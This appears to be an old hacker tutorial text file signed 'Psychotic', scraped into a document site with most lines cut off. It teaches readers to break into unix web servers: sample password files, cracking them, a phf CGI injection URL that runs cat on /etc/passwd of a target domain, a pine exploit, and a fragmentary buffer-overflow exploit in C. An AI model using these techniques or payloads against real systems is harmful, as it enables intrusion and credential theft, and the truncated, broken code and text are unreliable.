Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mai
Ok well one of the easiest ways of getting superuser access is through anonymous ftp access
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is the part that giv
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little difference, it's s
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password or sometimes they are disgui
Now that you know a little more about what the actual password file looks like you should b
Cracking a password file isn't as complicated as it would seem, although the files vary fro
Well I wasn't sure if I should include this section due to the fact that everybody already
The phf technique is by far the easiest way of getting a password file(although it doesn't
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to get the pw file
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
Well exploits are the best way of hacking webpages but they are also more complicated then
It's best to get an account with your target(if possible) and view the glitches from the in
and now on to another exploit. I'm going to display the pine exploit through linux. By watc
the respective lockfile.
This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr is th
now on to another one, this will be the last one that I'm going to show. Exploitation scrip
FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int i,j;
buf = malloc(4096);
i = BUFFER_SIZE-strlen(execshell);
Now that you've gotten root "what's next?" Well the choice is up to you but I would recomme
~~PSYCHOTIC~~